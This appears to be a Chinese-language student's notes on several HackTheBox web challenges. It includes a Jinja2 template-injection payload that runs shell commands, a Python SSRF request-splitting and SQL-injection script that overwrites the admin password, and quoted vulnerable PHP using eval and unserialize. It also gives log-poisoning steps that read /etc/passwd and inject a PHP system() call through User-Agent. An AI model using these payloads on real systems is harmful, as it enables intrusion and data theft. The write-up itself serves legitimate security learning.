Challenges->active challenges
Templated
非常简单的Flask/jinja2模板注入
1
2
3
4
| {% for c in ''.__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat flag.txt').read()")}}
{% endif %}{% endfor %}
|
啥过滤也没有,唯一难点估计是一眼看过去不知道注入点在哪,F12啥也没有
Phonebook
没写出来,没啥头绪
··············分割线·······················
进入靶机注意到这是个登录界面,尝试单双引号测试,显示登录失败,注意到url后?message提供错误信息,可以在url中修改改变红框内的报错信息,但没啥用。下面有个蓝色框的贴士
输入“\”页面无法连接,输入“*”进入搜索界面,输入1得到用户信息,然后卡了
··············分割线·······················
writeup:https://blog.csdn.net/galaxy3000/article/details/122975302?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169052768016800184190415%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=169052768016800184190415&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-122975302-null-null.142^v91^koosearch_v1,239^v3^insert_chatgpt&utm_term=hackthebox%20phonebook&spm=1018.2226.3001.4187
查看wp发现是模糊测试
这是啥?
通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞,用随机坏数据(也称做 fuzz)攻击一个程序,然后等着观察哪里遭到了破坏。模糊测试的技巧在于,将尽可能多的杂乱数据投入程序中。
解题需要找出管理员密码,而登陆前的贴士告诉了管理员是谁,查找得管理员username为reese
接下来需要写脚本暴力破解,时间较久,但网络不太行出不来
Weather APP
服务端请求伪造加SQL密码更新
··············分割线·······················
index.js可以看到:
1
2
3
4
5
6
7
| if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {
return res.status(401).end();
}
...
if (admin) return res.send(fs.readFileSync('/app/flag').toString());
|
说明此题需要对请求进行伪造且以管理员身份登录
database.js可以看到:
1
2
3
4
5
| INSERT INTO users (username, password) VALUES ('admin', '${ crypto.randomBytes(32).toString('hex') }');
...
let query = `INSERT INTO users (username, password) VALUES ('${user}', '${pass}')`;
|
管理员的密码进行了加密且username字段设置为不可重复,但注册界面没有进行过滤,可以选择密码更新
(好像sql-lab第17题是密码更新)
··············分割线·······················
wp:https://blog.csdn.net/wanmiqi/article/details/115873643
脚本:
1
2
3
4
5
6
7
8
9
10
11
12
| import requests
url = "http://157.245.39.76:31075"
username = 'admin'
password = "1111') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"
parseUsername = username.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")
parsePassword = password.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")
contentLength = len(parseUsername) + len(parsePassword) + 19
endpoint = '127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHOST:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120' + str(contentLength) + '\u010D\u010A\u010D\u010Ausername=' + parseUsername + '&password=' + parsePassword + '\u010D\u010A\u010D\u010AGET\u0120/?lol='
r = requests.post(url + '/api/weather', json={'endpoint': endpoint, 'city': 'chengdu', 'country': 'CN'})
print(r)
|
LoveTok
命令注入
··············分割线·······················
TimeController.php中:
1
2
| $format = isset($_GET['format']) ? $_GET['format'] : 'r';
$time = new TimeModel($format);
|
TimeModel.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| class TimeModel
{
public function __construct($format)
{
$this->format = addslashes($format);
[ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
$this->prediction = "+${d} day +${h} hour +${m} minute +${s} second";
}
public function getTime()
{
eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');
return isset($time) ? $time : 'Something went terribly wrong';
}
}
|
对输入(format)只有简单的过滤就把它放出来了
··············分割线·······················
wp:https://shakuganz.com/2021/06/23/hackthebox-lovetok-write-up/
一点反思
Weather App和LoveTok的题目都有不少文件,大部分没啥用,能在这些东西中找到能用的漏洞才能有突破口
LoveTok中接受了$_SERVER变量,但好像没啥用,可以算一个干扰吧
耐心看完题目逻辑才能知道大概干啥,以及多看看,不然都不知道题目想干啥
Toxic
下载源码,一眼php反序列化,但写之后其实算命令注入+文件包含
··············分割线·······················
index.php:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| <?php
spl_autoload_register(function ($name){
if (preg_match('/Model$/', $name))
{
$name = "models/${name}";
}
include_once "${name}.php";
});
if (empty($_COOKIE['PHPSESSID']))
{
$page = new PageModel;
$page->file = '/www/index.html';
setcookie(
'PHPSESSID',
base64_encode(serialize($page)),
time()+60*60*24,
'/'
);
}
$cookie = base64_decode($_COOKIE['PHPSESSID']);
unserialize($cookie);
|
PageModel.php:
1
2
3
4
5
6
7
8
9
10
| <?php
class PageModel
{
public $file;
public function __destruct()
{
include($this->file);
}
}
|
由源码可知,在页面刷新会发送Cookie,内容会将要打开的文件序列化后再base64加密,无过滤
1.对Cookie解码,修改读取文件为“/etc/passwd”
2.发现用户nginx,修改读取文件“/var/log/nginx/access.log”读取日志文件
3.发现日志文件用户记录请求头信息(User-Agent),修改为<?php system('ls /'); ?>注入命令
4.发现flag文件,再次修改请求头注入读取flag的命令即可
··············分割线·······················
wp:https://blog.csdn.net/qq_40952713/article/details/119795157